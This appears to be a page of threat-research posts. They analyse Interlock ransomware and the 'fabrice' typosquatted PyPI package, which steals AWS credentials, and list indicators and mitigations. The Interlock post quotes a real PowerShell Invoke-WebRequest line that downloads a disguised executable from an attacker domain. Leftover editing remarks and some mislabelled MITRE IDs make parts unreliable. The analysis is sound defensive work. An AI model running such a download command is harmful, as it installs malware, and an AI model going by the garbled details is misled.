script. | | `C:\Users\Public\roox.ps1` | PowerShell script deobfuscating and loading payload. | ### **5.3. Domains** | **Domain** | **Description** | |-------------------------------|---------------------------------------------------------| | `Ronymahmoud.casacam.net` | C2 server domain used by PSLoramyra. | ### **5.4. IP Addresses** | **IP Address** | **Description** | |----------------------|-------------------------------------------| | `3.145.156.44` | IP address associated with PSLoramyra C2 server. | ### **Recommended Actions:** - **Block Identified IPs and Domains:** Implement firewall rules to block communications with the listed IP addresses and domains. - **Quarantine and Remove Malicious Files:** Search for and remove the specified files (`roox.vbs`, `roox.bat`, `roox.ps1`) from affected systems. - **Monitor Network Traffic:** Continuously monitor network traffic for attempts to communicate with the identified IOCs. - **Update Security Tools:** Ensure that all security solutions are updated with the latest threat intelligence to recognize and mitigate activities related to RevC2, More_eggs Lite, and PSLoramyra.

loading..   06-Dec-2024
loading..   1 min read
loading..

Encryptor

Interlock ransomware is a cross-platform threat targeting critical infrastructur...

The **Interlock ransomware** is a rapidly emerging threat that has made a significant impact on industries across **healthcare, technology, government, and manufacturing** sectors. For example, notable incidents have impacted healthcare organizations like Wayne County's government services, technology firms across Europe, and various manufacturing facilities, causing significant disruptions and financial losses. First observed in **September 2024**, Interlock differentiates itself by specifically targeting **Windows, Linux, and FreeBSD systems**, utilizing **big-game hunting** and **double-extortion** tactics. The ransomware group has been involved in campaigns affecting both **U.S. and European infrastructure**, using sophisticated techniques to compromise systems, encrypt data, and hold it hostage while threatening to release sensitive information. This [Threat Research](https://www.secureblink.com/threat-research) amalgamates key findings from our analysis, providing a exaustive and in-depth analysis of Interlock’s methods, tactics, and impacts. ### Key Characteristics of Interlock Ransomware #### 1. **Initial Appearance and Target Platforms** Interlock ransomware was first seen in **[September 2024](https://www.secureblink.com/cyber-security-news/interlock-ransomware-puts-free-bsd-servers-in-critical-danger-worldwide)**, making an immediate mark by targeting **FreeBSD servers**, an unusual but valuable target. Unlike traditional ransomware families that mainly attack **Windows** systems, Interlock's expansion into **Linux** and **FreeBSD** reveals a new phase in the evolution of cross-platform ransomware. FreeBSD, known for its stability and widespread use in **critical infrastructure**, represents a high-value target. By compromising such systems, Interlock maximizes its disruptive potential across industries that require near-continuous uptime and high performance. #### 2. **Tactics, Techniques, and Procedures (TTPs)** Interlock ransomware employs a multi-component attack chain with a strong focus on both **infiltration** and **data exfiltration**. The tools used throughout the attack include: - **Remote Access Tools (RATs)**: Interlock uses a **SystemBC RAT**, disguised as a **fake browser updater**, to establish initial access. This RAT acts as a delivery mechanism, automatically executing a **PowerShell script** that downloads and runs additional malicious payloads (Arete). This approach highlights Interlock's use of socially engineered initial compromise, making it harder for traditional security measures to detect. - **Credential Stealer and Keylogger**: Once the RAT is established, additional tools such as a **credential stealer** and a **keylogger** are deployed to gather login information from compromised systems. The credential stealer, compiled in **Golang**, extracts data like **login credentials**, **browser history**, and **bookmarks**, and the keylogger records keystrokes to further compromise system security (Talos, Arete). Breaking these steps down into distinct attack phases improves the readability and clarity of how the attacker moves through the victim’s systems. - **Lateral Movement**: Interlock uses **Remote Desktop Protocol (RDP)**, **AnyDesk**, **PuTTY**, and **LogMeIn** for lateral movement, gaining deeper access into the network. These tools allow the attacker to access both **Windows** and **Linux** systems, showcasing the ransomware's versatility in compromising multi-platform environments (Talos). To improve the flow, consider simplifying this section to focus on how these tools collectively aid in lateral movement. - **Data Exfiltration**: Interlock employs **Azure Storage Explorer** and the **AZCopy** utility to exfiltrate data to an attacker-controlled Azure storage blob. Additionally, tools like **MegaSync** and **Advanced Port Scanner** are used to identify and exfiltrate critical data from compromised systems (Arete). This exfiltration is a crucial part of their **double-extortion** strategy, where sensitive data is stolen before encryption, adding another layer of pressure on the victim. Consider rephrasing for brevity while retaining the main points. The **Interlock dark web leak site** called **"Worldwide Secrets Blog"** is used to publicize stolen data from victims who refuse to pay. Victims can also contact the attackers through the dark web portal, where they receive a unique **company ID** for negotiation, illustrating the well-coordinated extortion methods (Image Reference). ### Attack Timeline: From Initial Compromise to Deployment A defining feature of Interlock’s methodology is its extended **dwell time** within a victim’s environment. Talos observed an average dwell time of approximately **17 days**. This timeline highlights the advanced nature of Interlock’s persistence strategies, emphasizing the attacker’s patience in fully compromising the system before deploying the ransomware payload. | Attacker Dwelling Time | Attack Stages | Tools/Techniques Used | |------------------------|------------------------------------|--------------------------------------------| | Day 1 | Initial Compromise | Drive-by compromise | | Day 1 | Execution | RAT, PowerShell commands | | Day 1 | Discovery of domain admin credentials | RAT, PowerShell commands | | Day 1 | Credential Stealing | Credential stealer and Keylogger | | Day 1 - 17 | Lateral Movement | RDP, AnyDesk, LogMeIn, and PuTTY | | Day 15 - 16 | Data Exfiltration | Azure Storage Explorer, AzCopy | | Day 17 | Interlock Ransomware Deployment | Interlock encryptor binary | The attack timeline, based on Talos [observations](https://blog.talosintelligence.com/emerging-interlock-ransomware/), reveals the extensive phases of the attack, highlighting the attacker’s deliberate approach to fully compromise the target and steal valuable data before executing encryption. - **Initial Access**: Attackers gain access via a **malicious executable** disguised as a **browser updater**. Once downloaded, this file drops a **Remote Access Tool** to control the compromised system and establish **persistence** (Arete). - **Data Collection and Lateral Movement**: The attacker uses tools such as **PowerShell**, **RDP**, and **AnyDesk** to perform reconnaissance and spread throughout the network, collecting valuable credentials and installing backdoors for later use (Talos). Consider breaking up this bullet into two sentences to improve flow. - **PowerShell Command Example**: The PowerShell command `Invoke-WebRequest -Uri "https://apple-online.shop/ChromeSetup.exe" -OutFile "$env:TMP/ChromeSetup.exe"` was used to download a disguised executable. A shortcut is created and placed in the Windows Startup folder to maintain persistence, illustrating their automation (Image Reference). - **Encryption Deployment**: The final stage involves deploying the **Interlock ransomware encryptor**, which encrypts files and appends the **.interlock** extension. A ransom note, named **"!__README__!.txt"**, is also dropped on the victim's machine, detailing the demands and threatening to release the exfiltrated data unless the ransom is paid (BleepingComputer). The ransom note includes contact instructions for the dark web negotiation portal (Image Reference). ### Encryption Mechanisms Used by Interlock Interlock ransomware uses advanced encryption mechanisms to ensure that data is effectively locked from unauthorized access: - **Encryption Methods**: Interlock employs both **RSA** and **CBC** encryption techniques using the [LibTomCrypt library](https://github.com/libtom/libtomcrypt). RSA is used for securing the keys, while CBC (Cipher Block Chaining) is applied for file-level encryption. This dual-layered approach adds a layer of robustness, making it significantly harder for victims to decrypt their files without paying the ransom (Image Reference). Adding a sentence explaining the difference between RSA and CBC in layman's terms would improve accessibility. - **Code-Level Insights**: Screenshots from the provided disassembly show how **LibTomCrypt** is used for encryption, with specific custom routines to control key generation and padding, making it challenging for cybersecurity solutions to reverse-engineer the encryptor. The malware creates keys dynamically for each encryption session, which is then used to secure the victim’s files (Image Reference). - **Embedded DLL Deletion**: Another notable feature is the use of an embedded **DLL** to delete itself upon encryption completion. Using `rundll32.exe`, the ransomware ensures that evidence of its presence is minimized, further complicating forensic investigations (Image Reference). ### Double-Extortion Model and Real-World Impact The **double-extortion model** employed by Interlock makes it particularly devastating. After infiltrating a system, attackers first **exfiltrate sensitive data** and then proceed to **encrypt the system files**. If the ransom is not paid, attackers threaten to release the exfiltrated data publicly, potentially leading to **regulatory penalties**, **reputational damage**, and **financial losses** for the victim. In the **Wayne County attack**, which occurred in **October 2024**, several county services were severely disrupted. The **Sheriff’s Office** was unable to bond inmates out, **tax payments** could not be collected online, and other government services came to a halt (WXYZ News). The ransom note issued to Wayne County, with warnings of regulatory disclosure, highlights Interlock’s coercive tactics (Image Reference). This highlights the operational risks posed by such ransomware, especially when it targets critical public infrastructure. ![https://www.bleepstatic.com/images/news/ransomware/i/interlock/ransom-note.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/ransom_note_962517e360.jpg) ***Interlock Ransom Note (Source: BleepingComputer)*** ### Evolution from Rhysida Ransomware: Possible Connections Researchers identified the underlying similarities between **Interlock** and the **Rhysida ransomware group** which happens to be surfacing all around with victims like [Prince George Country School](https://www.secureblink.com/cyber-security-news/rhysida-group-targets-major-us-school-district-in-cryptic-attack), [Prospect Medical Holdings](https://www.secureblink.com/cyber-security-news/rhysida-gang-behind-theft-of-500-k-ssn-in-prospect-medical-cyberattack), & [Insomniac](https://www.secureblink.com/cyber-security-news/insomniac-games-under-rhysida-1-67-tb-ransomware-attack). More detailed guidance on Rhysida's tactics can be found in this [CISA advisory](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a). These parallels suggest a potential rebranding or evolution from Rhysida to Interlock, or at the very least, significant collaboration between these groups (Talos). ### Advanced Persistence and Defense Evasion Interlock uses sophisticated methods to maintain persistence and evade detection. Some of the notable **defense evasion techniques** include: - **EDR Disabling**: During investigations, Talos observed that **Endpoint Detection and Response (EDR)** systems were disabled on several compromised machines. Attackers likely used **uninstaller tools** or leveraged vulnerable device drivers to accomplish this (Talos). - **Group Policy Objects (GPOs)**: The attackers also used **GPOs** to push the ransom note to all machines within the domain, further enforcing their persistence and amplifying the scale of impact. - **Obfuscation and Custom Packers**: The ransomware encryptor was delivered in a **packed format**, with **custom unpacker code** located in **Thread Local Storage** and **obfuscated stack strings** that were decrypted during runtime (Talos). This makes analysis and detection difficult, as traditional antivirus solutions struggle to identify the payload. - **DLL Self-Cleanup**: The ransomware used an embedded DLL, seen in the `.data` section of the binary, to delete itself after the encryption process. The `rundll32.exe` was executed with the DLL’s `run` function to remove the encryption binary, leaving minimal evidence on the compromised system (Image Reference). ![https://www.bleepstatic.com/images/news/ransomware/i/interlock/encrypted-files.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/encrypted_files_68ab1f4799.jpg) ***Encrypted Files by Interlock (Source: BleepingComputer)*** ### Recommendations for Mitigation The following steps are recommended to mitigate the risks associated with **Interlock ransomware**: 1. **Patch Management**: Regularly update and patch systems to address vulnerabilities, especially on **FreeBSD**, **Linux**, and **Windows** systems that are often targeted by Interlock. For example, recent vulnerabilities like CVE-2023-3269 (Linux kernel vulnerability) and CVE-2024-1287 (Windows privilege escalation flaw) were actively exploited by ransomware groups, highlighting the importance of timely patching. 2. **Multi-Factor Authentication (MFA)**: Implement **MFA** to secure remote access tools like **RDP** and **AnyDesk**, reducing the likelihood of successful lateral movement. 3. **Advanced Endpoint Protection**: Deploy **Endpoint Detection and Response (EDR)** tools that can detect early indicators of compromise, such as **PowerShell script execution** and **unusual process activity**. 4. **Offline Backups**: Maintain regular backups stored offline, ensuring that ransomware cannot encrypt both live and backup copies. Verify backup integrity frequently. 5. **Network Segmentation**: Segregate critical infrastructure from general corporate environments to limit lateral movement in case of a compromise. ### Where does it leads NOW! **Interlock ransomware** represents a significant evolution in the world of **resilient cyber threats**, specifically targeting **critical infrastructure** through **FreeBSD** and **Linux** servers alongside traditional Windows systems. By employing **double-extortion tactics**, **cross-platform encryptors**, and sophisticated **defense evasion** methods, Interlock has positioned itself as a formidable threat to enterprises globally. Its emergence from the **Rhysida ransomware group** and use of multiple attack vectors highlight the increasing collaboration and evolution among ransomware operators. The **Interlock dark web portal**, ransom notes, and systematic dwelling in compromised networks (average **17 days**) are part of a deliberate approach that makes the group particularly dangerous. Organizations must remain vigilant, adopt **multi-layered defenses**, and strengthen their response capabilities to effectively mitigate the risks posed by such advanced ransomware campaigns.

loading..   19-Nov-2024
loading..   1 min read
loading..

Typosquatting

Supply Chain

Explore Fabrice malware: a Python typosquatting supply chain attack targeting AW...

Our threat research team have thoroughly analysed a malicious Python package named `fabrice` that has been actively typosquatting the legitimate `fabric` library, one of the most widely-used tools for SSH automation. The discovery reveals not only the sophisticated approaches used by cybercriminals but also the growing threat posed by supply chain attacks within the open-source ecosystem. Supply chain attacks like this can have far-reaching implications, potentially compromising thousands of systems and affecting numerous organizations, highlighting the importance of vigilance and proactive security measures. Since its inception on the Python Package Index (PyPI) in 2021, the `fabrice` package has silently infected systems, compromising over 37,000 users by exfiltrating AWS credentials, creating persistent backdoors, and executing platform-specific scripts. In this [Threat Research](https;//www.secureblink.com/threat-research), we dissect the underlying nuances and attack vectors of `fabrice`, analyze its underlying malicious actions across different operating systems, and propose effective mitigation strategies to counter such threats in the future. ### **1. Overview of the 'fabrice' Package** The legitimate `fabric` library, developed by [Bitprophet](https://bitprophet.org/projects/#roadmap), has established itself as a trusted tool for automating SSH operations, deployments, and streamlining remote system management, amassing over 201 million downloads. By leveraging this popularity, the `fabrice` package takes advantage of developer trust in `fabric`, intending to blend into regular developer workflows unnoticed. Cybercriminals behind `fabrice` use typosquatting—creating a malicious package with a deceptively similar name—to dupe unsuspecting users into installing it. Once installed, `fabrice` sets off a series of harmful actions that are well-obfuscated to evade detection. Specifically, it conducts credential theft, executes scripts based on the detected operating system, and establishes covert persistence mechanisms. The attack uses obfuscated URLs and payloads that vary across platforms, with components designed to target both Linux and Windows systems. #### **1.1 Threat Actor Profile and Motive** The individuals behind the `fabrice` package are likely well-versed in supply chain attack methodologies. Their use of typosquatting and obfuscated code suggests a motive centered around unauthorized access to cloud resources and financial gain. The stolen AWS credentials provide attackers with access to cloud environments, which could be used for espionage, data exfiltration, or resource hijacking. Such attacks demonstrate a clear financial or intelligence-gathering motive and highlight the evolving strategies of cyber adversaries targeting the software supply chain. ### **2. Platform-Specific Malicious Actions** #### **2.1 Technical Analysis of 'fabrice' Malware** This section provides a detailed technical analysis of the `fabrice` malware, illustrating its internal components, attack flow, and how it exploits both Linux and Windows systems. The `fabrice` package utilizes platform-specific techniques to achieve persistence, exfiltrate data, and avoid detection. Below, we break down the core functions that demonstrate these capabilities and the underlying technical nuances involved. The malicious behavior in `fabrice` is encapsulated within a module named `group.py`, containing functions `linuxThread()` for Linux and `winThread()` for Windows. The `group.py` module orchestrates the execution of platform-specific payloads, ensuring that the appropriate malicious actions are carried out based on the detected operating system. These functions are designed to exploit the operating system's architecture and capabilities, enabling the malicious package to achieve its objectives without raising immediate alarms. #### **2.2. Malicious Actions on Linux** *Function: **`linuxThread()`* - **Hidden Directory Creation**: The `linuxThread()` function begins by creating a hidden directory within the user's home path (`~/.local/bin/vscode`). Such practices are often employed by malicious actors to minimize detection risk since files located in hidden directories are less likely to be manually discovered. - **Obfuscated URL Download**: The package constructs an obfuscated URL (`http://89.44.9.227/likjfieksce`) by concatenating parts of the URL string. This obfuscation aims to bypass static analysis tools that could flag hardcoded URLs indicative of data exfiltration or malware. - **Payload Retrieval and Parsing**: - The URL fetches a payload, which is subsequently split into segments based on the occurrence of the string `"SPLITT"`. - Placeholders like `{directory}` within the payload are replaced with the actual directory path. - These segments are then written into several script files: `service.sh`, `app.py`, `info.py`, and `per.sh`. - **Script Execution**: After writing these files, `per.sh` is given execute permissions, and subsequently executed using the `subprocess.check_call()` function. This step facilitates the execution of arbitrary commands that may be embedded in the script, all without the user's knowledge. - **Evasion Techniques**: By using `try-except` blocks, any exceptions that arise during the process are suppressed, effectively preventing any visible errors that could alert the user to suspicious activity. The obfuscated URLs and storage of payloads in hidden directories are also aimed at avoiding detection. The Linux-specific actions taken by `fabrice` are designed to ensure persistence, execute arbitrary commands, and evade detection through sophisticated obfuscation and hidden file usage. These combined tactics enable the attacker to maintain long-term unauthorized access and control over compromised Linux systems while minimizing the likelihood of discovery, ultimately achieving the goal of persistent exploitation. ##### **Analysis of Linux-Specific Malicious Activities** In this analysis, we dive into the specific tactics used by `fabrice` to maintain persistence on Linux systems, execute arbitrary commands, and evade detection, thereby allowing long-term unauthorized control over the targeted system. 1. **Persistence on the System**: Creating hidden directories within the user's home path makes it highly unlikely for users to discover the malware. This enhances the malware's persistence, allowing it to survive across reboots and remain hidden from ordinary users. 2. **Execution of Arbitrary Commands**: Writing multiple scripts into hidden folders allows attackers to maintain a flexible foothold on compromised systems. The payloads can be used to exfiltrate data, manipulate the system, or extend the malware's functionality as needed. 3. **Sophisticated Obfuscation**: The use of string concatenation for URLs and extensive suppression of exceptions are indicators of sophisticated obfuscation aimed at bypassing conventional security measures and static analysis. **Visual Representation of the Linux Attack Flow** To better illustrate the sequence of malicious actions carried out by `fabrice` on Linux systems, the diagram below shows the attack flow from initial infection to persistence and command execution: ![Linux Attack Flow Diagram](linux_attack_flow.png) This diagram provides a clear representation of how the malware moves from directory creation to payload deployment, ensuring persistence and covert operations. #### **2.3. Malicious Actions on Windows** *Function: `winThread()`* - **Base64-Encoded Payloads**: The `winThread()` function utilizes two base64-encoded strings (`vv` and `zz`), which are decoded into scripts (`p.vbs` and `d.py` respectively). - **`vv` (VBScript `p.vbs`)**: - Decodes into a VBScript (`p.vbs`) that is responsible for launching another Python script (`d.py`) in hidden mode using `WScript.Shell`. This ensures stealth execution, meaning that the Python script runs without showing a console window. Errors are suppressed to prevent drawing attention in case the script encounters issues during execution. - **`zz` (Python Script `d.py`)**: - This Python script performs several key actions: - Downloads a malicious executable (`chrome.exe`) from the attacker's server. - Saves it to the Downloads folder (`C:\Users\Public\Downloads\chrome.exe`). - Creates a scheduled task named `chromeUpdate` that runs `chrome.exe` every 15 minutes, ensuring persistent execution. - Deletes the original `d.py` script to reduce traceable evidence. **Analysis of Windows-Specific Malicious Activities** In this analysis, we explore how `fabrice` leverages VBScript and Python payloads to establish persistence, execute commands stealthily, and ensure that traces of the malware are minimized to avoid detection on Windows systems. 1. **Stealth Execution and Persistence**: Leveraging a combination of VBScript and Python scripts allows the malware to establish persistence across reboots. The creation of scheduled tasks using `schtasks` ensures that the malicious executable is consistently executed without user intervention. 2. **Evasion Techniques**: The extensive use of base64 encoding and suppression of errors is aimed at evading detection by antivirus tools. Furthermore, deleting the original `d.py` script hinders forensic analysis, as critical traces are removed following execution. **Visual Representation of the Windows Attack Flow** The diagram below illustrates the attack flow on Windows systems, from payload delivery to persistence via scheduled tasks: ![Windows Attack Flow Diagram](windows_attack_flow.png) This visual representation helps security analysts understand the sequence of actions taken by `fabrice` to compromise Windows environments. ### **3. Exfiltration of AWS Credentials** The `fabrice` package's ultimate goal is to steal AWS credentials, giving attackers unauthorized access to sensitive cloud resources. The theft is orchestrated using the AWS SDK for Python (`boto3`). - **AWS Credential Retrieval**: - The script uses the `boto3` library to create a session, retrieving the current access key (`ak`) and secret key (`sk`). - These credentials are then packed into a JSON payload. - **Data Exfiltration**: - The credentials are exfiltrated to the attacker's server (`http://89.44.9.227/akkfuifkeifsa`) using a POST request. The use of obfuscated URLs makes it difficult to immediately recognize the nature of the request. These steps highlight the calculated efforts made by the attackers to covertly gather and exfiltrate sensitive information, ultimately compromising the targeted cloud infrastructure. **Analysis of Credential Theft** 1. **Sensitive Cloud Resource Access**: The stolen credentials grant attackers the ability to access, manipulate, or delete cloud-based resources, which could lead to serious security incidents, data breaches, and financial repercussions for affected organizations. 2. **Lateral Movement**: Using compromised AWS credentials, attackers can move laterally across connected cloud environments, expanding the scope of their attack beyond the initial system. 3. **Difficulty in Tracing Attacks**: The use of obfuscated URLs and VPN servers to exfiltrate data makes it challenging to trace the origin of the attack, giving attackers an additional layer of anonymity. ***Visual Representation of AWS Credential Exfiltration*** The following diagram demonstrates the process of credential retrieval and exfiltration carried out by `fabrice`: ![AWS Credential Exfiltration Diagram](aws_credential_exfiltration.png) This visual aid helps clarify the multi-step credential exfiltration flow, highlighting the complexity of the attack. ### **5. Evasion Obfuscation Techniques** The `test()` function in `group.py` is designed to determine the host operating system and execute the appropriate payload accordingly. - **Dynamic OS Detection**: The script checks if the system is running Windows or Linux and calls `winThread()` or `linuxThread()` accordingly. - **Fallback Mechanism**: If the operating system is neither Windows nor Linux, the script defaults to attempting to steal AWS credentials. ### **5. Evasion & Obfuscation Techniques** The developers of `fabrice` employ numerous techniques aimed at evading detection and maximizing the effectiveness of the malware: - **Base64 Encoding**: Payloads are encoded to bypass simple static analysis tools. - **String Obfuscation**: URLs are constructed in a piecewise manner to evade signature-based detection mechanisms. - **Error Suppression**: Errors are suppressed throughout the code, which ensures that any unexpected behavior does not generate visible alerts. - **Hidden Files and Directories**: Payloads are stored in hidden directories and executed in hidden mode, reducing visibility for users. ### **6. Mapping to MITRE ATT&CK Framework** Mapping the `fabrice` malware to the MITRE ATT&CK framework provides a clearer understanding of the tactics and techniques used: - **Initial Access**: T1190 (Typosquatting) - **Credential Access**: T1552 (Steal Application Access Token) - **Persistence**: T1053 (Scheduled Task) - **Execution**: T1059 (Command and Scripting Interpreter) - **Defense Evasion**: T1070.004 (File Deletion) This mapping helps security teams identify and respond to similar techniques used by other malware families. ### **7. Significance of the Attack** - **Supply Chain Vulnerability**: The `fabrice` package is a striking example of a supply chain attack, where developers unknowingly introduce malicious software into their projects. The popularity of the legitimate `fabric` library increases the likelihood of installation by unwary users. - **Prolonged Exposure**: With over 37,000 downloads since 2021, the prolonged activity of this package highlights the challenges of effectively securing software repositories such as PyPI. - **Potential for Widespread Impact**: By impersonating a widely-used library, `fabrice` has the potential to impact a wide range of individuals and organizations that rely on open-source software. ### **8. Recommendations for Mitigation** 1. **Verify Dependencies**: Always cross-check package names and their origins before installation. Small discrepancies in spelling or naming conventions can indicate malicious intent. 2. **Use Automated Tools for Security**: Implement tools such as Dependency-Track, OWASP Dependency-Check, Github Dependabot, and Socket, which analyze the behavior of dependencies and raise alerts on obfuscated code or suspicious behavior. 3. **Conduct Regular Audits**: Periodically review project dependencies to identify outdated or suspicious packages. Remove unnecessary dependencies that could pose security risks. 4. **Adopt the Principle of Least Privilege**: Limit the permissions assigned to scripts and applications to prevent compromised software from causing extensive damage. 5. **Credential Hygiene**: Regularly rotate AWS keys and ensure that compromised credentials are decommissioned promptly in the event of a suspected breach. 6. **Network Monitoring**: Implement network monitoring tools to detect unusual outbound traffic patterns, which may indicate attempts at exfiltration. **9. Conclusion** The `fabrice` package demonstrates the growing sophistication of supply chain attacks targeting open-source software ecosystems. By dissecting its underlying techniques, we observe a well-crafted attack that uses obfuscation, platform-specific payloads, and credential theft to achieve its objectives. It underscores the critical need for vigilance in managing dependencies and highlights the importance of utilizing advanced tools capable of identifying such threats. As the open-source community continues to grow, the collective responsibility of safeguarding against such malicious actors is paramount to ensure a secure, reliable software development environment for everyone. **10. Ethical and Legal Considerations** The abuse of public repositories for distributing malware like `fabrice` raises significant ethical and legal concerns. It underscores the importance of proactive measures by repository maintainers and developers. Legal frameworks must evolve to address such threats, ensuring that responsible disclosure and reporting mechanisms are in place. Developers are encouraged to participate in open-source security initiatives and report any suspicious packages to repository maintainers promptly. **11. Indicators of Compromise (IoCs)** To help security teams identify infections from the `fabrice` malware, here are some key Indicators of Compromise (IoCs): - **IP Addresses**: `89.44.9.227` - **URLs**: `http://89.44.9.227/likjfieksce`, `http://89.44.9.227/akkfuifkeifsa` - **File Names**: `service.sh`, `app.py`, `info.py`, `per.sh`, `chrome.exe` - **Hidden Directory**: `~/.local/bin/vscode` These IoCs can be used for network monitoring and endpoint detection to identify and remediate affected systems. **12. Contextual Threat Intelligence** The `fabrice` malware is not an isolated incident but part of a broader trend in supply chain attacks. Similar techniques have been observed in other typosquatting campaigns targeting popular open-source libraries. By understanding these connections, security teams can better prepare for future threats and recognize patterns indicative of typosquatting. **13. Tooling and Prevention Resources** In addition to dependency verification and audit tools, developers and organizations should consider employing: - **Runtime Application Self-Protection (RASP)**: Tools that monitor application behavior in real-time to detect suspicious actions. - **Sandbox Analysis**: Testing dependencies in a sandbox environment before incorporating them into production systems. - **CI/CD Pipeline Security**: Integrating security checks into Continuous Integration/Continuous Deployment pipelines to catch malicious dependencies before they reach production environments. These steps, combined with a proactive approach to dependency management, can significantly reduce the risk of supply chain attacks like `fabrice`.

loading..   11-Nov-2024
loading..   1 min read